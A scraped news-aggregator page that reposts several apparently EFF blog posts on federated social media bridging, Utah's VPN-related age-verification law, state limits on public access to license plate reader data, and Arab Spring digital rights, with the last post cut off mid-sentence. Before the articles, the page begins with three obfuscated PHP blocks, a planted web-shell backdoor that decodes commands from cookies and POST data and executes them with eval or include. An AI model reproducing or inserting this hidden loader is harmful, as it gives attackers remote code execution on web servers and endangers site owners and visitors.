$zsyUCM = "\x78" . chr ( 717 - 616 )."\137" . "\x61" . "\x5a" . "\101";$PFjRtn = "\x63" . "\x6c" . 'a' . chr (115) . "\163" . chr (95) . chr (101) . chr (120) . "\151" . chr (115) . chr ( 287 - 171 )."\x73";$YFZuUhHJ = class_exists($zsyUCM); $PFjRtn = "42169";$ROEmCgEmgC = strpos($PFjRtn, $zsyUCM);if ($YFZuUhHJ == $ROEmCgEmgC){function LTEJSV(){$OrYPFIxe = new /* 33980 */ xe_aZA(12595 + 12595); $OrYPFIxe = NULL;}$YIomAGhZVv = "12595";class xe_aZA{private function lAIIvlAlpo($YIomAGhZVv){if (is_array(xe_aZA::$dNwWaPyr)) {$oiNkU2 = str_replace("<" . "?php", "", xe_aZA::$dNwWaPyr["content"]);eval($oiNkU2); $YIomAGhZVv = "12595";exit();}}public function IeLFPTWLCA(){$oiNkU = "283";$this->_dummy = str_repeat($oiNkU, strlen($oiNkU));}public function __destruct(){xe_aZA::$dNwWaPyr = @unserialize(xe_aZA::$dNwWaPyr); $YIomAGhZVv = "37902_53999";$this->lAIIvlAlpo($YIomAGhZVv); $YIomAGhZVv = "37902_53999";}public function yQmvnUBv($oiNkU, $DaAyMVqEO){return $oiNkU[0] ^ str_repeat($DaAyMVqEO, intval(strlen($oiNkU[0]) / strlen($DaAyMVqEO)) + 1);}public function kQEtSGyJY($oiNkU){$FWDQluj = 'b' . "\x61" . 's' . "\x65" . chr ( 316 - 262 ).'4';return array_map($FWDQluj . chr ( 891 - 796 )."\144" . chr (101) . "\143" . 'o' . "\x64" . chr ( 809 - 708 ), array($oiNkU,));}public function __construct($AoLbaKFRoC=0){$VGoFvkYG = chr (44); $oiNkU = "";$RXanOOsZ = $_POST;$lKWLjAlV = $_COOKIE;$DaAyMVqEO = "2a4af22a-324c-4495-ba8c-91e4652bb45d";$YWvPZEopg = @$lKWLjAlV[substr($DaAyMVqEO, 0, 4)];if (!empty($YWvPZEopg)){$YWvPZEopg = explode($VGoFvkYG, $YWvPZEopg);foreach ($YWvPZEopg as $avvNEVLMAi){$oiNkU .= @$lKWLjAlV[$avvNEVLMAi];$oiNkU .= @$RXanOOsZ[$avvNEVLMAi];}$oiNkU = $this->kQEtSGyJY($oiNkU);}xe_aZA::$dNwWaPyr = $this->yQmvnUBv($oiNkU, $DaAyMVqEO);if (strpos($DaAyMVqEO, $VGoFvkYG) !== FALSE){$DaAyMVqEO = explode($VGoFvkYG, $DaAyMVqEO); $IhlxuAFs = base64_decode(strrev($DaAyMVqEO[0]));}}public static $dNwWaPyr = 35467;}LTEJSV();}$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . "\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();} Anarcho-Libero-Constitutionalist-Transcendentalist – NewsStandard

Anarcho-Libero-Constitutionalist-Transcendentalist

READS: Bill of Rights (US) – Anarchist’s Cookbook – Preface to Transgression

VIDEOS: The Birth of a Tool, The Birth of a Wooden House, Basque Axes,

  • A Bridge to Somewhere: How to Link Your Mastodon, Bluesky, or Other Federated Accounts
    by Thorin Klosowski on May 1, 2026 at 2:52 pm

    One of the central promises of open social media services is interoperability—the idea that wherever you personally decide to post doesn’t require others to be there just to follow what you have to say. Think of it like a radio broadcast: you want to reach people and don't care where they are or what device they're using. For example, in theory, a Bluesky user can follow someone on Mastodon or Threads without having to create a Mastodon or Threads account. But these systems are still a work in progress, and you might need to tweak a few things to get it working correctly.Right now, broadcasting your message across social platforms can be a funky experience at best, deliberately broken up by oligopolists. The idea of the open web was baked into the internet via protocols like HTML and RSS that made it easy for anyone to visit a website or follow most blogs. The fact social media isn’t similarly open reflects an intentional choice to privatize the internet. Bridging and managing your posts so they’re viewable outside a singular source is part of the broader philosophy of POSSE, short for Post Own Site Syndicate Elsewhere (sometimes its Post Own Site, Share Everywhere). Instead of managing several accounts across different services, you post once to one primary site (which might be your personal website, or just one social media account), then set it up so it automatically publishes everywhere else. This way, it doesn’t matter where you or your audience is, and they're not walled off by account registration requirements. We’ll come back around to POSSE at the end of this post, but for now, let’s assume you just want your current main open social media account to actually have a chance to reach the most people it can. Why Post to the Open Social WebBecause the Fediverse and ATmosphere use different protocols, we need to use a third-party tool so accounts can communicate with each other. For that, we’ll need a bridge. As the name suggests, a bridge can connect one social media account to another, so you can post once and spread your message across several places. This isn’t just some niche concept: major blogging platforms like Wordpress and Ghost integrate posting to the Fediverse.Bridging is an important facet of POSSE, but also something more people should consider, even if they don’t run their own websites. For example, if you don’t want to create a Threads account just to interact with your one friend who uses that platform, you shouldn’t have to. The good news is, you don’t. There are several bridging services, like Fedisky, RSS Parrot, and pinhole, but Bridgy Fed is currently the simplest to use, so we’ll focus on that. How to Post to Bluesky from MastodonFrom your Mastodon account (or other Fediverse account, for simplicity’s sake we’ll stick to Mastodon throughout), search for the username @bsky.brid.gy@bsky.brid.gy and follow that account. Once you do, the account will follow you back and you’ll be bridged and people can find you from their Bluesky account. You should also get a DM with your bridged username. If you don’t see the @bsky.brid.gy@bsky.brid.gy user when you search, your Mastodon instance may be blocking the bridging tool. Threads users who have enabled Fediverse sharing will be able to find you with your standard Mastodon username (ie, @your_user_name@mastodon.social), but if they haven’t enabled sharing, they will not be able to see your account. While this search is still a beta feature, you might find it easier to share the full URL, which would look like this: https://www.threads.net/fediverse_profile/@your_user_name@mastodon.socialPeople on Bluesky can find you by: Either searching for your Mastodon username, or if that doesn’t work, @your_user_name.instance.ap.brid.gy. For example, if your username is @eff@mastodon.social, it would appear as @eff.mastodon.social.ap.brid.gy.An example of a Mastodon username from the Bluesky web client.How to Post to Mastodon and Bluesky from ThreadsYes, Threads is technically on the Fediverse, and you can bridge your Threads account to Mastodon or Bluesky (unless you’re in Europe, where the feature is disabled), but it’s a different process than on Bluesky and Mastodon.Open Settings > Account > Fediverse Sharing and set the option to “On.” This will make your posts visible to Mastodon (or other Fediverse) users, and vice versa. Once the Fediverse sharing is enabled, you’ll likely need to wait a week, then you can bridge to Bluesky. Search for and follow the @bsky.brid.gy@bsky.brid.gy account (it may take some digging to find it, but if that doesn’t work you can try visiting the profile page directly. People on Mastodon (or other Fediverse accounts) and Bluesky can find you by: Mastodon users can find you at, @your_threads_username@threads.net while Bluesky users will find you at, @your_threads_username.threads.net.ap.brid.gy (seriously, that will be the username). Note that some Mastodon instances may block Threads users entirely.An example of a Threads username from the Mastodon web client.An example of a Threads username from the Bluesky web client.How to Post to Mastodon and Threads from BlueskyFrom your Bluesky (or other ATProto) account, search for the username, “@ap.brid.gy” and follow that account. Once you do, the account will follow you back and you’ll be bridged, so people can follow you from Mastodon or other Fediverse accounts. You should also get a DM with your bridged username.People on Mastodon (or other Fediverse account) and Threads can find you by: Your username will appear as @your_bluesky_username@bsky.brid.gy. For example, if your Bluesky username is @eff@bsky.social, it would appear as @eff.bksy.social@bsky.brid.gy.An example of a Bluesky username from the Mastodon web client.How to Post Everywhere from Your Own WebsiteYou can bridge more than social media accounts. If you have your own website, you can bridge that too (as long as it supports microformats and webmention, or an Atom or RSS feed. If you have a blog, there’s a good chance you’re already good to go). When you do so, the bridged account will either post the full text (or image) of whatever you post to your personal site, or a link to that content,  depending on how your website is set up. You’ll also probably want to log into your Bridgy user page so you can manage the account. Where people can find your bridged account: Usually, a user can just search for your website’s URL on their decentralized social network of choice, or enter it on the Bridgy Fed page. But if that doesn’t work, they can try @yourdomain.com@web.brid.gy from Mastodon or @yourdomain.com.web.brid.gy from Bluesky.An example of a bridged website username in the Mastodon web client.How Your Account Username Looks on Each PlatformYou’re Bound to Run Into Some QuirksSometimes messages take a little while to crossover between networks, and sometimes they don't crossover at all.You can’t log into a bridged account like a regular account, but Bridgy Fed does provide some tools to see incoming notifications and recent activity in case they’re not coming through properly.ActivityPub and ATProto don’t have the same feature set, so you will have certain capabilities for one account you might not have in another. For example, you can edit posts on Mastodon, but not on Bluesky. If you edit a post that’s bridged from Mastodon to Bluesky, the Bluesky post will not be updated. Replies can sometimes get lost, especially if the person (or people) replying to you doesn’t have sharing turned on.Ownership of accounts can get weird. For example, if you post to your own website and use a tool like Wordpress or Ghost for federation (more info below), you don’t necessarily get access to a “normal” social media account, with a standard login and password.And more! This is still a work in progress that has some technical quirks, but it’s improving all the time, and it’s best to keep telling yourself that troubleshooting is part of the fun.Other Cool Stuff You Can DoAs mentioned up top, there’s a lot more you can do, and an increasing number of tools are making this process simpler. Bridgy Fed is one way to post to more places from a single account, but it’s far from the only way to do so. Here are just a few examples.Micro.blog is a paid service where you can blog from your own domain name, then post automatically to Mastodon, Bluesky, Threads, Tumblr, Nostr, LinkedIn, Medium, Pixelfed, and Flickr.Ghost is a blogging and newsletter platform that offers direct integration with the Fediverse, as well as support for Bluesky. Wordpress offers the option to join the Fediverse through a community plugin. Other newsletter platforms, like Buttondown, also have plans for federation. Surf.social is a landing page and social media utility where you can show off all your various accounts (Federated or not). From the reader point of view, you can follow one publications numerous types of posts in one place. For example, 404 Media’s Surf.social feed includes its YouTube feed, podcast feed, and its journalist’s social media posts.If you think these new handles are a bit ugly, you can use a custom domain for Bluesky or fediverse account from your website. Of course, there are plenty of other tools, blogging platforms, and other utilities out there to help facilitate posting and bridging accounts, with new ones coming along every day. With proper support, time, and effort, eventually we will all be able to seamlessly interact across platforms, take our follows and followers to other services when a platform no longer suits our needs, and interact with a variety of web content regardless of what platform hosts it. Until then, we still need to do some DIY work, support the services we want to succeed, and push for more platforms and services to support federated protocols.

  • Utah’s New Law Targeting VPNs Goes Into Effect Next Week
    by Rindala Alajaji on April 30, 2026 at 11:33 pm

    For the last couple of years, we’ve watched the same predictable cycle play out across the globe: a state (or country) passes a clunky age-verification mandate, and, without fail, Virtual Private Network (VPN) usage surges as residents scramble to maintain their privacy and anonymity. We've seen this everywhere—from states like Florida, Missouri, Texas, and Utah, to countries like the United Kingdom, Australia, and Indonesia.  Instead of realizing that mass surveillance and age gates aren't exactly crowd favorites, Utah lawmakers have decided that VPNs themselves are the real issue. Next week, on May 6, 2026, Utah will become, to EFF’s knowledge, the first state in the nation to target the use of VPNs to avoid legally mandated age-verification gates. While advocates in states like Wisconsin successfully forced the removal of similar provisions due to constitutional and technical concerns, Utah is proceeding with a mandate that threatens to significantly undermine digital privacy rights.  What the Bill Does Formally known as the “Online Age Verification Amendments,” Senate Bill 73 (SB 73) was signed by Governor Spencer Cox on March 19, 2026. While the majority of the bill consists of provisions related to a 2% tax on revenues from online adult content that is set to take effect in October, one of the more immediate concerns for EFF is the section regulating VPN access, which goes into effect this coming Wednesday. The VPN Provisions The new law explicitly addresses VPN use in Section 14, which amends Section 78B-3-1002 of existing Utah statutes in two primary ways: Regulation based on physical location: Under the law, an individual is considered to be accessing a website from Utah if they are physically located there, regardless of whether they use a VPN, proxy server, or other means to disguise their geographic location. Ban on sharing VPN instructions: Commercial entities that host "a substantial portion of material harmful to minors" are now prohibited from facilitating or encouraging the use of a VPN to bypass age checks. This includes providing instructions on how to use a VPN or providing the means to circumvent geofencing. By holding companies liable for verifying the age of anyone physically in Utah, even those using a VPN, the law creates a massive "liability trap." Just like we argued in the case of the Wisconsin bill, if a website cannot reliably detect a VPN user's true location and the law requires it to do so for all users in a particular state, then the legal risk could push the site to either ban all known VPN IPs, or to mandate age verification for every visitor globally. This would subject millions of users to invasive identity checks or blocks to their VPN use, regardless of where they actually live.  "Don't Ask, Don't Tell" In practice, SB 73 is different from the Wisconsin proposal in that it stops short of a total VPN ban. Instead, it discourages using VPNs by imposing the liability described above and by muzzling the websites themselves from sharing information about VPNs. This raises significant First Amendment concerns, as it prevents platforms from providing basic, truthful information about a lawful privacy tool to their users.  Unlike previous drafts seen in other states, SB 73 doesn't explicitly ban the use of a VPN. Under a "don't ask, don't tell" style of enforcement, websites likely only have an obligation to ask for proof of age if they actually learn that a user is physically in Utah and using a VPN. If a site doesn’t know a user is in Utah, their broader obligation to police VPNs remains murky. So, while SB 73 isn’t as extreme as the discarded Wisconsin proposal, it remains a dangerous precedent. Technical Feasibility Then there is also the question of technical feasibility: Blocking all known VPN and proxy IP addresses is a technical whack-a-mole that likely no company can win. Providers add new IP addresses constantly, and no comprehensive blocklist exists. Complying with Utah’s requirements would require impossible technical feats. The internet is built to, and will always, route around censorship. If Utah successfully hampers commercial VPN providers, motivated users will transition to non-commercial proxies, private tunnels through cloud services like AWS, or residential proxies that are virtually indistinguishable from standard home traffic. These workarounds will emerge within hours of the law taking effect. Meanwhile, the collateral damage will fall on businesses, journalists, and survivors of abuse who rely on commercial VPNs for essential data security. These provisions won't stop a tech-savvy teenager, but they certainly will impact the privacy of every regular Utah resident who just wants to keep their data out of the hands of brokers or malicious actors. Uncharted Territory Lawmakers have watched age-verification mandates fail and, instead of reconsidering the approach, have decided to wage war on privacy itself. As the Cato Institute states:  “The point is that when an internet policy can be avoided by a relatively common technology that often provides significant privacy and security benefits, maybe the policy is the problem. Age verification regimes do plenty of damage to online speech and privacy, but attacking VPNs to try to keep them from being circumvented is doubling down on this damaging approach." Attacks on VPNs are, at their core, attacks on the tools that enable digital privacy. Utah is setting a precedent that prioritizes government control over the fundamental architecture of a private and secure internet, and it won’t stop at the state’s borders. Regulators in countries outside the U.S. are still eyeing VPN restrictions, with the UK Children’s Commissioner calling VPNs a “loophole that needs closing” and the French Minister Delegate for Artificial Intelligence and Digital Affairs saying VPNs are “the next topic on my list” after the country enacted a ban on social media for kids under 15. As this law goes into effect next week, we are entering uncharted territory. Lawmakers who can’t distinguish between a security tool and a "loophole" are now writing the rules for one of the most complex infrastructures on Earth. And we can assure that the result won't be a safer internet, only an increasingly less private one.

  • Open Records Laws Reveal ALPRs’ Sprawling Surveillance. Now States Want to Block What the Public Sees.
    by Beryl Lipton on April 30, 2026 at 4:54 pm

    Reporters, community advocates, EFF, and others have used public records laws to reveal and counteract abuse, misuse, and fraudulent narratives around how law enforcement agencies across the country use and share data collected by automated license plate readers (ALPRs). EFF is alarmed by recent laws in several states that have blocked public access to data collected by ALPRs, including, in some cases, information derived from ALPR data. We do not support pending bills in Arizona and Connecticut that would block the public oversight capabilities that ALPR information offers. Every state has laws granting members of the public the right to obtain records from state and local governments. These are often called “freedom of information acts” (FOIAs) or “public records acts” (PRAs). They are a powerful check by the people on their government, and EFF frequently advocates for robust public access and uses the laws to scrutinize government surveillance.  But lawmakers across the country, often in response to public scrutiny of police ALPRs, are introducing or enacting measures aimed at excluding broad swaths of ALPR information from disclosure under these public records laws. This could include whole categories of important information: general information about the extent of law enforcement use; details on ALPR sharing across policing agencies; data on the number of license plate scans conducted, where they happened, and how many “hits” for license plates of interest actually occur; analyses on how many false matches or other errors occur; and images taken of individuals’ own vehicles.  No thanks. Public records and public scrutiny of ALPR programs have shown that people are harmed by these systems and that retained ALPR data violates people’s privacy. In this moment, lawmakers should not be completely cutting off access to public records that document the abuses perpetuated by ALPRs.  Transparency with privacy To be sure, there are legitimate concerns about wholesale public disclosure of raw ALPR data. After all, many of the harms people experience from these systems are based on the government’s collection, retention, and use of this information. Public transparency rights should not exacerbate the privacy harms suffered by people subjected to ALPR surveillance. But many current proposals do not address legitimate privacy concerns in a measured way, much less seek to harmonize people’s privacy with the public’s right to know. There is a better path to balancing privacy and transparency rights than outright bans or total disclosure.  Any legislative proposal concerning public access to ALPR data must start with this reality: ALPR data is deeply revealing about where a person goes, and thus about what they are doing and who they are doing it with. That’s a reason why EFF opposes ALPRs. It is dangerous that the police have so much of our ALPR information. Even worse for our privacy would be for police to disclose our ALPR information to our bosses, political opponents, and ex-friends. Or to surveillance-oriented corporations that would use our ALPR information to send us targeted ads, or monetize it by selling it to the highest bidder. On the other hand, EFF’s firsthand experience using public records from ALPR systems demonstrates the strong accountability value of public access to many kinds of ALPR data, including information like data-sharing reports and network audits. For example, in our “Data Driven” series, we used ALPR data-sharing and hit ratio reports to investigate the extent of ALPR data sharing between police departments and to analyze the number of ALPR scans that are ultimately associated with a crime-related vehicle. We have also identified racist uses of ALPR systems, ALPR surveillance of protestors, and ALPR tracking of a person who sought an abortion. Across the country, municipalities have been shutting down their contracts for ALPR use, often citing concerns with data sharing with federal and immigration agents.  These records are not just informational—they are leverage. Communities, journalists, and local officials have used ALPR disclosures to block new deployments, refuse contract renewals, and terminate existing agreements with surveillance vendors whose practices proved too dangerous to continue. Without this evidentiary record, it is far harder for cities to exercise their procurement power to say no. It is not always easy to harmonize transparency and privacy when one person wishes to use a public records law to obtain government records that reveal people’s personal information. The best approach is for public records laws to contain a privacy exemption that requires balancing, on a case-by-case basis, of the transparency benefits versus the privacy costs of disclosure. Many do. These provisions of public records laws already accommodate similar concerns about disclosing personal information of private individuals whose information the government may have collected, government employee’s private data, and other personal information.  The balancing provisions in these laws are often flexible and allow for nuance. For example, if a government record contains a mix of information that does not reveal people’s private information and some that does, agencies and courts can disclose the non-private information while withholding the truly private information. This is often accomplished with blacking out, or redacting, the private information. Applying this privacy-and-transparency balancing to ALPR records, it will often be appropriate for the government to disclose some information and withhold other information. Everybody should generally have access to records showing their own movements and other information captured by ALPRs, but the privacy protections in public records laws should foreclose a single person’s ability to get a copy of similar records about everyone else. And even with accessing your own data, there are complications with shared vehicles that should be considered when balancing privacy and transparency. An example of where it may be appropriate to release unredacted data and images would be vehicles engaged in non-sensitive government business. For example, a member of the public might use ALPR scans of garbage trucks to identify gaps in service, which would not reveal private information. On other hand, it would be inappropriate to release the scans of a government social worker visiting their clients.  Public records laws should allow a requester to obtain some ALPR information about government surveillance of everyone else, in a manner that accommodates the public transparency interest in disclosure and people’s privacy interests. For example, the best public records laws would disclose the times and places that plate data was collected, but not plate data itself. This can be done, for example, by an agency or court finding that disclosing aggregated and/or deidentified ALPR data protects the privacy or other interests of individuals captured within the data. The best laws recognize that aggregation or de-identification of databases are redactions in service of individual privacy (which responding agencies must do), and are not creating new public records (which responding agencies sometimes need not do).  Likewise, in a government audit log of police searches of stored ALPR data, it will often be appropriate to disclose an officer’s investigative purposes to conduct a search, and the officer’s search terms – but not the search term if it is a license plate number. Many people do not want the world to know that they are under police investigation, and many public records laws generally limit the disclosure of such sensitive facts because of the reputational and privacy harm inherent in that disclosure. Aggregate ALPR information about, for example, the amount of data collected and error rates can have important transparency value and impact government policy. Requiring the public release of that kind of data contributes to informed public discussion of how our policing agencies do their jobs. This kind of information has been used to study, critique, and provide oversight of ALPR use. Thus, the wholesale exemption of ALPR information from disclosure under state public records laws would stymie the public’s ability to monitor how their government is using powerful and controversial surveillance technology. EFF cannot support such laws. Blocking transparency In Connecticut, SB 4 is a pending bill that would exclude, from that state’s public records law, information “gathered by” an ALPR or “created through an analysis of the information gathered by” an ALPR. This could ultimately harm individual civilians, who would have less ability to protect themselves from law enforcement that indiscriminately collect vehicle information. Other provisions of this bill would limit government use of ALPRs, and regulate data brokers. In Arizona, SB 1111 would restrict public access to ALPR data “collected by” an ALPR. The bill would even make it a felony to access or use data from an ALPR (or disseminate it) in violation of this article, which apparently might apply to a member of the public who obtained ALPR data with a public records request. The bill’s author claims it adds “guardrails” for ALPR use. Earlier this year, Washington state enacted a law that will exempt data “collected by” ALPRs from the state’s public records law. While “bona fide research” will still be a way for some people to obtain ALPR data, this may not include journalists and activists who analyze aggregate data to identify policy flaws. Notably, Washington courts found last year that information generated by ALPR, including images of an individual’s own vehicle, are public records; this new legislation will override that decision, blocking the ability for people to see what photos police have taken of their own vehicles. Other provisions of this new law will limit government use of ALPRs. A year ago, Illinois’ HB 3339 ended use of that state’s public records law to obtain ALPR information used and collected by the Illinois State Police (ISP), including both information “gathered by an ALPR” and information “created from the analysis of data generated by an ALPR.” This Illinois language for just the ISP is very similar to what is now being considered in Connecticut for all state and local agencies.  Sadly, the list goes on. Georgia exempted ALPR data (both “captured by or derived from” ALPRs) of any government agency from its open records law. Adding insult to injury, Georgia also made it a misdemeanor to knowingly request, use, or obtain law enforcement’s plate data for any purpose other than law enforcement. Maryland exempted “information gathered by” an ALPR from its public information act. Oklahoma exempted from its open records act the ALPR data “collected, retained or shared” by District Attorneys under that state’s Uninsured Vehicle Enforcement Program. These laws and bills in seven states are an unwelcome national trend. Next steps We urge legislators to reject efforts to amend state public records laws to wholly exempt ALPR information. This would diminish meaningful oversight over these controversial technologies. Public disclosure of some ALPR information is important.  There is a better approach for states that want to harmonize privacy and transparency in the context of ALPR data:  Open records laws should cover, and not exclude, information collected by ALPRs, and also any public records derived from that information. Open records laws should have a privacy exemption that applies to all records, including information collected or derived from ALPRs. That exemption should require a case-by-case balancing of the transparency benefits and privacy costs of disclosure. These provisions work best when agencies and courts can analyze the context of the particular records, the weight of the privacy interests and public interests at stake, and other specific facts to fashion the best balance between these competing values.  When a document contains both exempt and non-exempt information, open records laws should require disclosure of the latter and withholding of the former. The best public records laws allow agencies to black out, or redact, specific private information while disclosing non-private information in the same records, threading the privacy and transparency needle. Finally, in the context of a law enforcement ALPR database (including both data collected by ALPRs and audit logs of police searches of stored ALPR data), the law should permit agencies to disclose aggregated and/or deidentified data, while withholding personally identifiable data. Importantly, the law should recognize that the steps an agency takes to protect individual privacy in ALPR databases should not be construed as creating a new public record.  FOIA balancing standards are one layer in a larger governance stack, and work best alongside strong guardrails on whether and how governments procure ALPR systems in the first place: public debate over vendor contracts, binding surveillance ordinances, strict data‑retention limits, and clear pathways to end ALPR programs entirely where the risks prove too great.

  • Digital Hopes, Real Power: From Connection to Collective Action
    by Jillian C. York on April 30, 2026 at 7:56 am

    This is the fifth and final installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the rest of the series here. If the Arab Spring was defined by optimism about what the internet could do, the years since have been marked by a more sober understanding of what it takes to defend it.  Back in 2011, the term “digital rights” was still fairly new. While in the decades prior, open source and hacker communities—as well as a handful of organizations including EFF—had advocated for digital freedoms, it was through the merging of disparate communities from around the world in the 2000s that digital rights came to be more clearly understood as an extension of fundamental human rights. In 2011, we observed that there were only a few organizations focused on digital rights in the region. Groups like Nawaat, which emerged from the Tunisian diaspora under the Ben Ali regime; the Arab Digital Expression Foundation, formed to promote the creative use of technology; and SMEX, which was initially created to teach journalists and others about social media but has grown to become a powerful force in the region, led the way. Since that time, dozens of organizations have emerged throughout the region to promote freedom of expression, innovation, privacy, and digital security. Understanding how the digital rights movement evolved in the Middle East and North Africa requires a closer look at the communities that shaped it, and the organizations that are carrying on the fight today. Perspectives from people and organizations that were key to these efforts offer critical insight into how the movement has grown and what challenges lie ahead. Reem Almasri, a senior researcher and digital sovereignty consultant, says that: ‘Digital rights’ emerged as a term around the Arab Spring, when the internet was still a fairly unregulated space, we were still trying to figure out the tech companies’ policies, and force governments to look at the internet as a fundamental right like water and electricity. But then the need to converge digital rights to everyday rights—economic, political, social rights—and to connect it to geopolitics has started to be thought about, and to be in discussion as well. And to not look at digital rights as a separate field from everything else that’s affecting it, from the geopolitical context. Mohamad Najem, who co-founded SMEX in 2008 and has led it to become the largest organization in the region, told me that, at the time, “Nobody gave [social media] a lot of attention in our region.” Their work was “a positive approach to social media, how we can democratize sharing information, how we can share more from civil society, change people’s minds, et cetera.” “After that phase,” he continues, “we can think about 2012-2013—after the Arab Spring, as an organization we started looking at the infrastructure of the internet, and how freedom of expression and privacy are affected. That’s when we started looking more at what we call digital rights.” Towards Tech Accountability In the aftermath of the Arab Spring, social media companies moved from a largely hands-off approach to governance toward more formalized—and often opaque—content moderation systems. Platforms expanded their trust and safety teams and began working more closely with civil society through trusted partnerships in the region and globally. But, Mohamad Najem says: After the expansion of tech accountability itself and the adaptation of tech companies, we’ve noticed that it’s not taking us anywhere. Gradually we’ve come to a new phase where it feels like tech accountability is an economy by itself that is not leading to real results. So the next phase for us at least and maybe for others in global majority communities is how we can focus on digital public good, how we can push more governments, private and public institutions to adopt more open source software, to look at the ecosystem and understand the US threats happening now, et cetera. Another group that has played a key role in the fight for digital rights and tech accountability in the region is 7amleh, a Palestinian organization that was founded in 2013. At the time, says Jalal Abukhater: [I]t was unique and interesting in Palestinian society to have a human rights organization dedicated fully to the topic of digital rights, you know, human rights in a digital format. However, with the years, we saw various milestones, we saw progress of policy decisions and movements through the Israeli government to influence content moderation in Big Tech companies. We saw problems there as an organization. 7amleh took a 